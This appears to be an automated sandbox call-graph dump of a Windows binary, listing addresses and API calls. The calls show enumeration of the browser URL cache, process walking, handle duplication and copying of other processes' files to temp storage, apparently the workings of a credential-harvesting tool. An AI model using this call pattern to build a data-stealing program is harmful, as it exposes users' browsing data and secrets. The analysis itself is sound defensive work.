memcpy memcpy 38040 40ebe1 38039->38040 38041 40ebb7 38039->38041 38040->38039 38042 40ebf2 ??2@YAPAXI ??2@YAPAXI 38040->38042 38041->38040 38043 40d134 16 API calls 38041->38043 38044 40ec2e ??2@YAPAXI 38042->38044 38047 40ec65 38042->38047 38043->38041 38044->38047 38059 40ea7f 38047->38059 38048 402f49 38048->37834 38050 40e8f2 38049->38050 38051 40e8eb ??3@YAXPAX 38049->38051 38052 40e900 38050->38052 38053 40e8f9 ??3@YAXPAX 38050->38053 38051->38050 38054 40e911 38052->38054 38055 40e90a ??3@YAXPAX 38052->38055 38053->38052 38056 40e931 ??2@YAPAXI ??2@YAPAXI 38054->38056 38057 40e921 ??3@YAXPAX 38054->38057 38058 40e92a ??3@YAXPAX 38054->38058 38055->38054 38056->38039 38057->38058 38058->38056 38060 40aa04 free 38059->38060 38061 40ea88 38060->38061 38062 40aa04 free 38061->38062 38063 40ea90 38062->38063 38064 40aa04 free 38063->38064 38065 40ea98 38064->38065 38066 40aa04 free 38065->38066 38067 40eaa0 38066->38067 38068 40a9ce 4 API calls 38067->38068 38069 40eab3 38068->38069 38070 40a9ce 4 API calls 38069->38070 38071 40eabd 38070->38071 38072 40a9ce 4 API calls 38071->38072 38073 40eac7 38072->38073 38074 40a9ce 4 API calls 38073->38074 38075 40ead1 38074->38075 38075->38048 38076->38007 38077->38011 38135 40b2cc 38078->38135 38080 402b0a 38081 40b2cc 27 API calls 38080->38081 38082 402b23 38081->38082 38083 40b2cc 27 API calls 38082->38083 38084 402b3a 38083->38084 38085 40b2cc 27 API calls 38084->38085 38086 402b54 38085->38086 38087 40b2cc 27 API calls 38086->38087 38088 402b6b 38087->38088 38089 40b2cc 27 API calls 38088->38089 38090 402b82 38089->38090 38091 40b2cc 27 API calls 38090->38091 38092 402b99 38091->38092 38093 40b2cc 27 API calls 38092->38093 38094 402bb0 38093->38094 38095 40b2cc 27 API calls 38094->38095 38096 402bc7 38095->38096 38097 40b2cc 27 API calls 38096->38097 38098 402bde 38097->38098 38099 40b2cc 27 API calls 38098->38099 38100 402bf5 38099->38100 38101 40b2cc 27 API calls 38100->38101 38102 402c0c 38101->38102 38103 40b2cc 27 API calls 38102->38103 38104 402c23 38103->38104 38105 40b2cc 27 API calls 38104->38105 38106 402c3a 38105->38106 38107 40b2cc 27 API calls 38106->38107 38108 402c51 38107->38108 38109 40b2cc 27 API calls 38108->38109 38110 402c68 38109->38110 38111 40b2cc 27 API calls 38110->38111 38112 402c7f 38111->38112 38113 40b2cc 27 API calls 38112->38113 38114 402c99 38113->38114 38115 40b2cc 27 API calls 38114->38115 38116 402cb3 38115->38116 38117 40b2cc 27 API calls 38116->38117 38118 402cd5 38117->38118 38119 40b2cc 27 API calls 38118->38119 38120 402cf0 38119->38120 38121 40b2cc 27 API calls 38120->38121 38122 402d0b 38121->38122 38123 40b2cc 27 API calls 38122->38123 38124 402d26 38123->38124 38125 40b2cc 27 API calls 38124->38125 38126 402d3e 38125->38126 38127 40b2cc 27 API calls 38126->38127 38128 402d59 38127->38128 38129 40b2cc 27 API calls 38128->38129 38130 402d78 38129->38130 38131 40b2cc 27 API calls 38130->38131 38132 402d93 38131->38132 38133 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38132->38133 38133->38015 38134->38005 38138 40b58d 38135->38138 38137 40b2d1 38137->38080 38139 40b5a4 GetModuleHandleW FindResourceW 38138->38139 38140 40b62e 38138->38140 38141 40b5c2 LoadResource 38139->38141 38143 40b5e7 38139->38143 38140->38137 38142 40b5d0 SizeofResource LockResource 38141->38142 38141->38143 38142->38143 38143->38140 38151 40afcf 38143->38151 38145 40b608 memcpy 38154 40b4d3 memcpy 38145->38154 38147 40b61e 38155 40b3c1 18 API calls 38147->38155 38149 40b626 38156 40b04b 38149->38156 38152 40b04b ??3@YAXPAX 38151->38152 38153 40afd7 ??2@YAPAXI 38152->38153 38153->38145 38154->38147 38155->38149 38157 40b051 ??3@YAXPAX 38156->38157 38158 40b05f 38156->38158 38157->38158 38158->38140 38159->38023 38161 4032c4 38160->38161 38162 40b633 free 38161->38162 38163 403316 38162->38163 38182 44553b 38163->38182 38167 403480 38380 40368c 15 API calls 38167->38380 38169 403489 38170 40b633 free 38169->38170 38172 403495 38170->38172 38171 40333c 38171->38167 38173 4033a9 memset memcpy 38171->38173 38174 4033ec wcscmp 38171->38174 38378 4028e7 11 API calls 38171->38378 38379 40f508 6 API calls 38171->38379 38172->38025 38173->38171 38173->38174 38174->38171 38176 403421 _wcsicmp 38176->38171 38179 444a64 FreeLibrary 38178->38179 38180 444a83 38178->38180 38179->38180 38180->38025 38181->38026 38183 445548 38182->38183 38184 445599 38183->38184 38381 40c768 38183->38381 38185 4455a8 memset 38184->38185 38327 4457f2 38184->38327 38465 403988 38185->38465 38191 4455e5 38200 445672 38191->38200 38210 44560f 38191->38210 38193 4458bb memset memset 38197 414c2e 16 API calls 38193->38197 38195 4459ed 38201 445a00 memset memset 38195->38201 38202 445b22 38195->38202 38196 44595e memset memset 38203 414c2e 16 API calls 38196->38203 38204 4458f9 38197->38204 38198 44557a 38205 44558c 38198->38205 38445 4136c0 38198->38445 38476 403fbe memset memset memset memset memset 38200->38476 38207 414c2e 16 API calls 38201->38207 38212 445bca 38202->38212 38213 445b38 memset memset memset 38202->38213 38208 44599c 38203->38208 38209 40b2cc 27 API calls 38204->38209 38449 444b06 38205->38449 38217 445a3e 38207->38217 38219 40b2cc 27 API calls 38208->38219 38220 445909 38209->38220 38222 4087b3 335 API calls 38210->38222 38221 445c8b memset memset 38212->38221 38278 445cf0 38212->38278 38225 445bd4 38213->38225 38226 445b98 38213->38226 38214 445849 38659 40b1ab free free 38214->38659 38227 40b2cc 27 API calls 38217->38227 38235 4459ac 38219->38235 38231 409d1f 6 API calls 38220->38231 38236 414c2e 16 API calls 38221->38236 38232 445621 38222->38232 38224 44589f 38660 40b1ab free free 38224->38660 38614 414c2e 38225->38614 38226->38225 38238 445ba2 38226->38238 38240 445a4f 38227->38240 38230 403335 38377 4452e5 43 API calls 38230->38377 38246 445919 38231->38246 38645 4454bf 20 API calls 38232->38645 38233 445823 38233->38214 38255 4087b3 335 API calls 38233->38255 38234 445854 38241 4458aa 38234->38241 38591 403c9c memset memset memset memset memset 38234->38591 38247 409d1f 6 API calls 38235->38247 38248 445cc9 38236->38248 38750 4099c6 wcslen 38238->38750 38239 4456b2 38647 40b1ab free free 38239->38647 38252 409d1f 6 API calls 38240->38252 38241->38193 38274 44594a 38241->38274 38244 445d3d 38273 40b2cc 27 API calls 38244->38273 38245 445d88 memset memset memset 38256 414c2e 16 API calls 38245->38256 38661 409b98 GetFileAttributesW 38246->38661 38257 4459bc 38247->38257 38258 409d1f 6 API calls 38248->38258 38249 445879 38249->38224 38268 4087b3 335 API calls 38249->38268 38251 445680 38251->38239 38499 4087b3 memset 38251->38499 38261 445a63 38252->38261 38253 40b2cc 27 API calls 38262 445bf3 38253->38262 38255->38233 38265 445dde 38256->38265 38726 409b98 GetFileAttributesW 38257->38726 38267 445ce1 38258->38267 38259 445bb3 38753 445403 memset 38259->38753 38271 40b2cc 27 API calls 38261->38271 38630 409d1f wcslen wcslen 38262->38630 38263 445928 38263->38274 38662 40b6ef 38263->38662 38275 40b2cc 27 API calls 38265->38275 38770 409b98 GetFileAttributesW 38267->38770 38268->38249 38280 445a94 38271->38280 38283 445d54 _wcsicmp 38273->38283 38274->38195 38274->38196 38286 445def 38275->38286 38276 4459cb 38276->38195 38293 40b6ef 249 API calls 38276->38293 38278->38230 38278->38244 38278->38245 38279 445389 255 API calls 38279->38212 38727 40ae18 38280->38727 38281 44566d 38281->38327 38550 413d4c 38281->38550 38290 445d71 38283->38290 38354 445d67 38283->38354 38285 445665 38646 40b1ab free free 38285->38646 38291 409d1f 6 API calls 38286->38291 38771 445093 23 API calls 38290->38771 38298 445e03 38291->38298 38293->38195 38294 4456d8 38300 40b2cc 27 API calls 38294->38300 38297 44563c 38297->38285 38303 4087b3 335 API calls 38297->38303 38772 409b98 GetFileAttributesW 38298->38772 38299 40b6ef 249 API calls 38299->38230 38305 4456e2 38300->38305 38301 40b2cc 27 API calls 38306 445c23 38301->38306 38302 445d83 38302->38230 38303->38297 38648 413fa6 _wcsicmp _wcsicmp 38305->38648 38310 409d1f 6 API calls 38306->38310 38308 445e12 38314 445e6b 38308->38314 38321 40b2cc 27 API calls 38308->38321 38312 445c37 38310->38312 38311 4456eb 38317 4456fd memset memset memset memset 38311->38317 38318 4457ea 38311->38318 38319 445389 255 API calls 38312->38319 38313 445b17 38747 40aebe 38313->38747 38774 445093 23 API calls 38314->38774 38649 409c70 wcscpy wcsrchr 38317->38649 38652 413d29 38318->38652 38325 445c47 38319->38325 38326 445e33 38321->38326 38323 445e7e 38328 445f67 38323->38328 38331 40b2cc 27 API calls 38325->38331 38332 409d1f 6 API calls 38326->38332 38327->38234 38568 403e2d memset memset memset memset memset 38327->38568 38334 40b2cc 27 API calls 38328->38334 38329 445ab2 memset 38335 40b2cc 27 API calls 38329->38335 38337 445c53 38331->38337 38333 445e47 38332->38333 38773 409b98 GetFileAttributesW 38333->38773 38339 445f73 38334->38339 38340 445aa1 38335->38340 38336 409c70 2 API calls 38341 44577e 38336->38341 38342 409d1f 6 API calls 38337->38342 38344 409d1f 6 API calls 38339->38344 38340->38313 38340->38329 38345 409d1f 6 API calls 38340->38345 38353 445389 255 API calls 38340->38353 38734 40add4 38340->38734 38739 40ae51 38340->38739 38346 409c70 2 API calls 38341->38346 38347 445c67 38342->38347 38343 445e56 38343->38314 38351 445e83 memset 38343->38351 38348 445f87 38344->38348 38345->38340 38349 44578d 38346->38349 38350 445389 255 API calls 38347->38350 38777 409b98 GetFileAttributesW 38348->38777 38349->38318 38356 40b2cc 27 API calls 38349->38356 38350->38212 38355 40b2cc 27 API calls 38351->38355 38353->38340 38354->38230 38354->38299 38357 445eab 38355->38357 38358 4457a8 38356->38358 38359 409d1f 6 API calls 38357->38359 38360 409d1f 6 API calls 38358->38360 38361 445ebf 38359->38361 38362 4457b8 38360->38362 38363 40ae18 9 API calls 38361->38363 38651 409b98 GetFileAttributesW 38362->38651 38373 445ef5 38363->38373 38365 4457c7 38365->38318 38367 4087b3 335 API calls 38365->38367 38366 40ae51 9 API calls 38366->38373 38367->38318 38368 445f5c 38370 40aebe FindClose 38368->38370 38369 40add4 2 API calls 38369->38373 38370->38328 38371 40b2cc 27 API calls 38371->38373 38372 409d1f 6 API calls 38372->38373 38373->38366 38373->38368 38373->38369 38373->38371 38373->38372 38375 445f3a 38373->38375 38775 409b98 GetFileAttributesW 38373->38775 38776 445093 23 API calls 38375->38776 38377->38171 38378->38176 38379->38171 38380->38169 38382 40c775 38381->38382 38778 40b1ab free free 38382->38778 38384 40c788 38779 40b1ab free free 38384->38779 38386 40c790 38780 40b1ab free free 38386->38780 38388 40c798 38389 40aa04 free 38388->38389 38390 40c7a0 38389->38390 38781 40c274 memset 38390->38781 38395 40a8ab 9 API calls 38396 40c7c3 38395->38396 38397 40a8ab 9 API calls 38396->38397 38398 40c7d0 38397->38398 38810 40c3c3 38398->38810 38402 40c877 38411 40bdb0 38402->38411 38403 40c86c 38838 4053fe 37 API calls 38403->38838 38406 40c813 _wcslwr 38836 40c634 47 API calls 38406->38836 38408 40c829 wcslen 38409 40c7e5 38408->38409 38409->38402 38409->38403 38835 40a706 wcslen memcpy 38409->38835 38837 40c634 47 API calls 38409->38837 38972 404363 38411->38972 38416 40b2cc 27 API calls 38417 40be02 wcslen 38416->38417 38418 40bf5d 38417->38418 38426 40be1e 38417->38426 38989 40440c 38418->38989 38419 40be26 wcsncmp 38419->38426 38422 40be7d memset 38423 40bea7 memcpy 38422->38423 38422->38426 38424 40bf11 wcschr 38423->38424 38423->38426 38424->38426 38425 40b2cc 27 API calls 38427 40bef6 _wcsnicmp 38425->38427 38426->38418 38426->38419 38426->38422 38426->38423 38426->38424 38426->38425 38428 40bf43 LocalFree 38426->38428 38992 40bd5d 28 API calls 38426->38992 38993 404423 38426->38993 38427->38424 38427->38426 38428->38426 38429 4135f7 39005 4135e0 38429->39005 38432 40b2cc 27 API calls 38433 41360d 38432->38433 38434 40a804 8 API calls 38433->38434 38435 413613 38434->38435 38436 41363e 38435->38436 38438 40b273 27 API calls 38435->38438 38437 4135e0 FreeLibrary 38436->38437 38439 413643 38437->38439 38440 413625 38438->38440 38439->38198 38440->38436 38441 413648 38440->38441 38442 413658 38441->38442 38443 4135e0 FreeLibrary 38441->38443 38442->38198 38444 413666 38443->38444 38444->38198 38447 4136e2 38445->38447 38446 413827 38644 41366b FreeLibrary 38446->38644 38447->38446 38448 4137ac CoTaskMemFree 38447->38448 38448->38447 39008 4449b9 38449->39008 38452 444c1f 38452->38184 38453 4449b9 35 API calls 38455 444b4b 38453->38455 38454 444c15 38457 4449b9 35 API calls 38454->38457 38455->38454 39028 444972 GetVersionExW 38455->39028 38457->38452 38458 444b99 memcmp 38462 444b8c 38458->38462 38459 444c0b 39032 444a85 35 API calls 38459->39032 38462->38458 38462->38459 39029 444aa5 35 API calls 38462->39029 39030 40a7a0 GetVersionExW 38462->39030 39031 444a85 35 API calls 38462->39031 38466 40399d 38465->38466 39033 403a16 38466->39033 38468 403a09 39047 40b1ab free free 38468->39047 38470 403a12 wcsrchr 38470->38191 38471 4039a3 38471->38468 38474 4039f4 38471->38474 39044 40a02c CreateFileW 38471->39044 38474->38468 38475 4099c6 2 API calls 38474->38475 38475->38468 38477 414c2e 16 API calls 38476->38477 38478 404048 38477->38478 38479 414c2e 16 API calls 38478->38479 38480 404056 38479->38480 38481 409d1f 6 API calls 38480->38481 38482 404073 38481->38482 38483 409d1f 6 API calls 38482->38483 38484 40408e 38483->38484 38485 409d1f 6 API calls 38484->38485 38486 4040a6 38485->38486 38487 403af5 20 API calls 38486->38487 38488 4040ba 38487->38488 38489 403af5 20 API calls 38488->38489 38490 4040cb 38489->38490 39074 40414f memset 38490->39074 38492 4040e0 38493 404140 38492->38493 38495 4040ec memset 38492->38495 38497 4099c6 2 API calls 38492->38497 38498 40a8ab 9 API calls 38492->38498 39088 40b1ab free free 38493->39088 38495->38492 38496 404148 38496->38251 38497->38492 38498->38492 39101 40a6e6 WideCharToMultiByte 38499->39101 38501 4087ed 39102 4095d9 memset 38501->39102 38504 408809 memset memset memset memset memset 38505 40b2cc 27 API calls 38504->38505 38506 4088a1 38505->38506 38507 409d1f 6 API calls 38506->38507 38508 4088b1 38507->38508 38509 40b2cc 27 API calls 38508->38509 38510 4088c0 38509->38510 38511 409d1f 6 API calls 38510->38511 38512 4088d0 38511->38512 38513 40b2cc 27 API calls 38512->38513 38514 4088df 38513->38514 38515 409d1f 6 API calls 38514->38515 38516 4088ef 38515->38516 38517 40b2cc 27 API calls 38516->38517 38518 4088fe 38517->38518 38519 409d1f 6 API calls 38518->38519 38520 40890e 38519->38520 38521 40b2cc 27 API calls 38520->38521 38522 40891d 38521->38522 38523 409d1f 6 API calls 38522->38523 38524 40892d 38523->38524 39119 409b98 GetFileAttributesW 38524->39119 38526 40893e 38527 408943 38526->38527 38528 408958 38526->38528 39120 407fdf 75 API calls 38527->39120 39121 409b98 GetFileAttributesW 38528->39121 38531 408964 38532 408969 38531->38532 38533 40897b 38531->38533 39122 4082c7 198 API calls 38532->39122 38536 408953 38536->38251 38551 40b633 free 38550->38551 38552 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38551->38552 38553 413f00 Process32NextW 38552->38553 38554 413da5 OpenProcess 38553->38554 38555 413f17 CloseHandle 38553->38555 38556 413df3 memset 38554->38556 38559 413eb0 38554->38559 38555->38294 39151 413f27 38556->39151 38558 413ebf free 38558->38559 38559->38553 38559->38558 38560 4099f4 3 API calls 38559->38560 38560->38559 38561 413e37 GetModuleHandleW 38563 413e46 38561->38563 38565 413e1f 38561->38565 38563->38565 38564 413e6a QueryFullProcessImageNameW 38564->38565 38565->38561 38565->38564 39156 413959 38565->39156 39172 413ca4 38565->39172 38567 413ea2 CloseHandle 38567->38559 38569 414c2e 16 API calls 38568->38569 38570 403eb7 38569->38570 38571 414c2e 16 API calls 38570->38571 38572 403ec5 38571->38572 38573 409d1f 6 API calls 38572->38573 38574 403ee2 38573->38574 38575 409d1f 6 API calls 38574->38575 38576 403efd 38575->38576 38577 409d1f 6 API calls 38576->38577 38578 403f15 38577->38578 38579 403af5 20 API calls 38578->38579 38580 403f29 38579->38580 38581 403af5 20 API calls 38580->38581 38582 403f3a 38581->38582 38583 40414f 33 API calls 38582->38583 38589 403f4f 38583->38589 38584 403faf 39185 40b1ab free free 38584->39185 38585 403f5b memset 38585->38589 38587 403fb7 38587->38233 38588 4099c6 2 API calls 38588->38589 38589->38584 38589->38585 38589->38588 38590 40a8ab 9 API calls 38589->38590 38590->38589 38592 414c2e 16 API calls 38591->38592 38593 403d26 38592->38593 38594 414c2e 16 API calls 38593->38594 38595 403d34 38594->38595 38596 409d1f 6 API calls 38595->38596 38597 403d51 38596->38597 38598 409d1f 6 API calls 38597->38598 38599 403d6c 38598->38599 38600 409d1f 6 API calls 38599->38600 38601 403d84 38600->38601 38602 403af5 20 API calls 38601->38602 38603 403d98 38602->38603 38604 403af5 20 API calls 38603->38604 38605 403da9 38604->38605 38606 40414f 33 API calls 38605->38606 38612 403dbe 38606->38612 38607 403e1e 39186 40b1ab free free 38607->39186 38608 403dca memset 38608->38612 38610 403e26 38610->38249 38611 4099c6 2 API calls 38611->38612 38612->38607 38612->38608 38612->38611 38613 40a8ab 9 API calls 38612->38613 38613->38612 38615 414b81 8 API calls 38614->38615 38616 414c40 38615->38616 38617 414c73 memset 38616->38617 39187 409cea 38616->39187 38619 414c94 38617->38619 39190 414592 RegOpenKeyExW 38619->39190 38621 414c64 SHGetSpecialFolderPathW 38623 414d0b 38621->38623 38623->38253 38624 414cc1 38625 414cf4 wcscpy 38624->38625 39191 414bb0 wcscpy 38624->39191 38625->38623 38627 414cd2 39192 4145ac RegQueryValueExW 38627->39192 38629 414ce9 RegCloseKey 38629->38625 38631 409d62 38630->38631 38632 409d43 wcscpy 38630->38632 38635 445389 38631->38635 38633 409719 2 API calls 38632->38633 38634 409d51 wcscat 38633->38634 38634->38631 38636 40ae18 9 API calls 38635->38636 38637 4453c4 38636->38637 38638 40ae51 9 API calls 38637->38638 38639 4453f3 38637->38639 38640 40add4 2 API calls 38637->38640 38643 445403 250 API calls 38637->38643 38638->38637 38641 40aebe FindClose 38639->38641 38640->38637 38642 4453fe 38641->38642 38642->38301 38643->38637 38644->38205 38645->38297 38646->38281 38647->38281 38648->38311 38650 409c89 38649->38650 38650->38336 38651->38365 38653 413d39 38652->38653 38654 413d2f FreeLibrary 38652->38654 38655 40b633 free 38653->38655 38654->38653 38656 413d42 38655->38656 38657 40b633 free 38656->38657 38658 413d4a 38657->38658 38658->38327 38659->38234 38660->38241 38661->38263 38663 44db70 38662->38663 38664 40b6fc memset 38663->38664 38665 409c70 2 API calls 38664->38665 38666 40b732 wcsrchr 38665->38666 38667 40b743 38666->38667 38668 40b746 memset 38666->38668 38667->38668 38669 40b2cc 27 API calls 38668->38669 38670 40b76f 38669->38670 38671 409d1f 6 API calls 38670->38671 38672 40b783 38671->38672 39193 409b98 GetFileAttributesW 38672->39193 38674 40b792 38676 409c70 2 API calls 38674->38676 38688 40b7c2 38674->38688 38678 40b7a5 38676->38678 38681 40b2cc 27 API calls 38678->38681 38679 40b837 CloseHandle 38683 40b83e memset 38679->38683 38680 40b817 39277 409a45 GetTempPathW 38680->39277 38684 40b7b2 38681->38684 39227 40a6e6 WideCharToMultiByte 38683->39227 38685 409d1f 6 API calls 38684->38685 38685->38688 38686 40b827 38686->38683 39194 40bb98 38688->39194 38689 40b866 39228 444432 38689->39228 38692 40bad5 38695 40b04b ??3@YAXPAX 38692->38695 38693 40b273 27 API calls 38694 40b89a 38693->38694 39274 438552 38694->39274 38697 40baf3 38695->38697 38697->38274 38699 40bacd 39308 443d90 110 API calls 38699->39308 38702 40bac6 39307 424f26 122 API calls 38702->39307 38703 40b8bd memset 39298 425413 17 API calls 38703->39298 38706 425413 17 API calls 38724 40b8b8 38706->38724 38709 40a71b MultiByteToWideChar 38709->38724 38710 40a734 MultiByteToWideChar 38710->38724 38713 40b9b5 memcmp 38713->38724 38714 4099c6 2 API calls 38714->38724 38715 404423 37 API calls 38715->38724 38718 4251c4 136 API calls 38718->38724 38719 40bb3e memset memcpy 39309 40a734 MultiByteToWideChar 38719->39309 38721 40bb88 LocalFree 38721->38724 38724->38702 38724->38703 38724->38706 38724->38709 38724->38710 38724->38713 38724->38714 38724->38715 38724->38718 38724->38719 38725 40ba5f memcmp 38724->38725 39299 4253ef 16 API calls 38724->39299 39300 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38724->39300 39301 4253af 17 API calls 38724->39301 39302 4253cf 17 API calls 38724->39302 39303 447280 memset 38724->39303 39304 447960 memset memcpy memcpy memcpy 38724->39304 39305 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38724->39305 39306 447920 memcpy memcpy memcpy 38724->39306 38725->38724 38726->38276 38728 40aebe FindClose 38727->38728 38729 40ae21 38728->38729 38730 4099c6 2 API calls 38729->38730 38731 40ae35 38730->38731 38732 409d1f 6 API calls 38731->38732 38733 40ae49 38732->38733 38733->38340 38735 40ade0 38734->38735 38736 40ae0f 38734->38736 38735->38736 38737 40ade7 wcscmp 38735->38737 38736->38340 38737->38736 38738 40adfe wcscmp 38737->38738 38738->38736 38740 40ae7b FindNextFileW 38739->38740 38741 40ae5c FindFirstFileW 38739->38741 38742 40ae94 38740->38742 38743 40ae8f 38740->38743 38741->38742 38745 40aeb6 38742->38745 38746 409d1f 6 API calls 38742->38746 38744 40aebe FindClose 38743->38744 38744->38742 38745->38340 38746->38745 38748 40aed1 38747->38748 38749 40aec7 FindClose 38747->38749 38748->38202 38749->38748 38751 4099d7 38750->38751 38752 4099da memcpy 38750->38752 38751->38752 38752->38259 38754 40b2cc 27 API calls 38753->38754 38755 44543f 38754->38755 38756 409d1f 6 API calls 38755->38756 38757 44544f 38756->38757 39698 409b98 GetFileAttributesW 38757->39698 38759 44545e 38760 445476 38759->38760 38761 40b6ef 249 API calls 38759->38761 38762 40b2cc 27 API calls 38760->38762 38761->38760 38763 445482 38762->38763 38764 409d1f 6 API calls 38763->38764 38765 445492 38764->38765 39699 409b98 GetFileAttributesW 38765->39699 38767 4454a1 38768 4454b9 38767->38768 38769 40b6ef 249 API calls 38767->38769 38768->38279 38769->38768 38770->38278 38771->38302 38772->38308 38773->38343 38774->38323 38775->38373 38776->38373 38777->38354 38778->38384 38779->38386 38780->38388 38782 414c2e 16 API calls 38781->38782 38783 40c2ae 38782->38783 38839 40c1d3 38783->38839 38788 40c3be 38805 40a8ab 38788->38805 38789 40afcf 2 API calls 38790 40c2fd FindFirstUrlCacheEntryW 38789->38790 38791 40c3b6 38790->38791 38792 40c31e wcschr 38790->38792 38793 40b04b ??3@YAXPAX 38791->38793 38794 40c331 38792->38794 38795 40c35e FindNextUrlCacheEntryW 38792->38795 38793->38788 38797 40a8ab 9 API calls 38794->38797 38795->38792 38796 40c373 GetLastError 38795->38796 38798 40c3ad FindCloseUrlCache 38796->38798 38799 40c37e 38796->38799 38800 40c33e wcschr 38797->38800 38798->38791 38801 40afcf 2 API calls 38799->38801 38800->38795 38802 40c34f 38800->38802 38803 40c391 FindNextUrlCacheEntryW 38801->38803 38804 40a8ab 9 API calls 38802->38804 38803->38792 38803->38798 38804->38795 38933 40a97a 38805->38933 38808 40a8cc 38808->38395 38809 40a8d0 7 API calls 38809->38808 38938 40b1ab free free 38810->38938 38812 40c3dd 38813 40b2cc 27 API calls 38812->38813 38814 40c3e7 38813->38814 38939 414592 RegOpenKeyExW 38814->38939 38816 40c3f4 38817 40c50e 38816->38817 38818 40c3ff 38816->38818 38832 405337 38817->38832 38819 40a9ce 4 API calls 38818->38819 38820 40c418 memset 38819->38820 38940 40aa1d 38820->38940 38823 40c471 38825 40c47a _wcsupr 38823->38825 38824 40c505 RegCloseKey 38824->38817 38826 40a8d0 7 API calls 38825->38826 38827 40c498 38826->38827 38828 40a8d0 7 API calls 38827->38828 38829 40c4ac memset 38828->38829 38830 40aa1d 38829->38830 38831 40c4e4 RegEnumValueW 38830->38831 38831->38824 38831->38825 38942 405220 38832->38942 38834 405340 38834->38409 38835->38406 38836->38408 38837->38409 38838->38402 38840 40ae18 9 API calls 38839->38840 38846 40c210 38840->38846 38841 40ae51 9 API calls 38841->38846 38842 40c264 38843 40aebe FindClose 38842->38843 38845 40c26f 38843->38845 38844 40add4 2 API calls 38844->38846 38851 40e5ed memset memset 38845->38851 38846->38841 38846->38842 38846->38844 38847 40c231 _wcsicmp 38846->38847 38848 40c1d3 34 API calls 38846->38848 38847->38846 38849 40c248 38847->38849 38848->38846 38864 40c084 21 API calls 38849->38864 38852 414c2e 16 API calls 38851->38852 38853 40e63f 38852->38853 38854 409d1f 6 API calls 38853->38854 38855 40e658 38854->38855 38865 409b98 GetFileAttributesW 38855->38865 38857 40e667 38858 409d1f 6 API calls 38857->38858 38860 40e680 38857->38860 38858->38860 38866 409b98 GetFileAttributesW 38860->38866 38861 40e68f 38862 40c2d8 38861->38862 38867 40e4b2 38861->38867 38862->38788 38862->38789 38864->38846 38865->38857 38866->38861 38888 40e01e 38867->38888 38869 40e593 38870 40e5b0 38869->38870 38871 40e59c DeleteFileW 38869->38871 38872 40b04b ??3@YAXPAX 38870->38872 38871->38870 38874 40e5bb 38872->38874 38873 40e521 38873->38869 38911 40e175 38873->38911 38876 40e5c4 CloseHandle 38874->38876 38877 40e5cc 38874->38877 38876->38877 38879 40b633 free 38877->38879 38878 40e573 38880 40e584 38878->38880 38881 40e57c CloseHandle 38878->38881 38882 40e5db 38879->38882 38932 40b1ab free free 38880->38932 38881->38880 38883 40b633 free 38882->38883 38885 40e5e3 38883->38885 38885->38862 38887 40e540 38887->38878 38931 40e2ab 30 API calls 38887->38931 38889 406214 22 API calls 38888->38889 38890 40e03c 38889->38890 38891 40e16b 38890->38891 38892 40dd85 60 API calls 38890->38892 38891->38873 38893 40e06b 38892->38893 38893->38891 38894 40afcf ??2@YAPAXI ??3@YAXPAX 38893->38894 38895 40e08d OpenProcess 38894->38895 38896 40e0a4 GetCurrentProcess DuplicateHandle 38895->38896 38900 40e152 38895->38900 38897 40e0d0 GetFileSize 38896->38897 38898 40e14a CloseHandle 38896->38898 38901 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38897->38901 38898->38900 38899 40e160 38903 40b04b ??3@YAXPAX 38899->38903 38900->38899 38902 406214 22 API calls 38900->38902 38904 40e0ea 38901->38904 38902->38899 38903->38891 38905 4096dc CreateFileW 38904->38905 38906 40e0f1 CreateFileMappingW 38905->38906 38907 40e140 CloseHandle CloseHandle 38906->38907 38908 40e10b MapViewOfFile 38906->38908 38907->38898 38909 40e13b CloseHandle 38908->38909 38910 40e11f WriteFile UnmapViewOfFile 38908->38910 38909->38907 38910->38909 38912 40e18c 38911->38912 38913 406b90 11 API calls 38912->38913 38914 40e19f 38913->38914 38915 40e1a7 memset 38914->38915 38916 40e299 38914->38916 38921 40e1e8 38915->38921 38917 4069a3 ??3@YAXPAX free 38916->38917 38918 40e2a4 38917->38918 38918->38887 38919 406e8f 13 API calls 38919->38921 38920 406b53 SetFilePointerEx ReadFile 38920->38921 38921->38919 38921->38920 38922 40dd50 _wcsicmp 38921->38922 38923 40e283 38921->38923 38927 40742e 8 API calls 38921->38927 38928 40aae3 wcslen wcslen _memicmp 38921->38928 38929 40e244 _snwprintf 38921->38929 38922->38921 38924 40e291 38923->38924 38925 40e288 free 38923->38925 38926 40aa04 free 38924->38926 38925->38924 38926->38916 38927->38921 38928->38921 38930 40a8d0 7 API calls 38929->38930 38930->38921 38931->38887 38932->38869 38935 40a980 38933->38935 38934 40a8bb 38934->38808 38934->38809 38935->38934 38936 40a995 _wcsicmp 38935->38936 38937 40a99c wcscmp 38935->38937 38936->38935 38937->38935 38938->38812 38939->38816 38941 40aa23 RegEnumValueW 38940->38941 38941->38823 38941->38824 38943 40522a 38942->38943 38968 405329 38942->38968 38944 40b2cc 27 API calls 38943->38944 38945 405234 38944->38945 38946 40a804 8 API calls 38945->38946 38947 40523a 38946->38947 38969 40b273 38947->38969 38949 405248 _mbscpy _mbscat 38950 40526c 38949->38950 38951 40b273 27 API calls 38950->38951 38952 405279 38951->38952 38953 40b273 27 API calls 38952->38953 38954 40528f 38953->38954 38955 40b273 27 API calls 38954->38955 38956 4052a5 38955->38956 38957 40b273 27 API calls 38956->38957 38958 4052bb 38957->38958 38959 40b273 27 API calls 38958->38959 38960 4052d1 38959->38960 38961 40b273 27 API calls 38960->38961 38962 4052e7 38961->38962 38963 40b273 27 API calls 38962->38963 38964 4052fd 38963->38964 38965 40b273 27 API calls 38964->38965 38966 405313 38965->38966 38967 40b273 27 API calls 38966->38967 38967->38968 38968->38834 38970 40b58d 27 API calls 38969->38970 38971 40b18c 38970->38971 38971->38949 38973 40440c FreeLibrary 38972->38973 38974 40436d 38973->38974 38975 40a804 8 API calls 38974->38975 38976 404377 38975->38976 38977 4043f7 38976->38977 38978 40b273 27 API calls 38976->38978 38977->38416 38977->38418 38979 40438d 38978->38979 38980 40b273 27 API calls 38979->38980 38981 4043a7 38980->38981 38982 40b273 27 API calls 38981->38982 38983 4043ba 38982->38983 38984 40b273 27 API calls 38983->38984 38985 4043ce 38984->38985 38986 40b273 27 API calls 38985->38986 38987 4043e2 38986->38987 38987->38977 38988 40440c FreeLibrary 38987->38988 38988->38977 38990 404413 FreeLibrary 38989->38990 38991 40441e 38989->38991 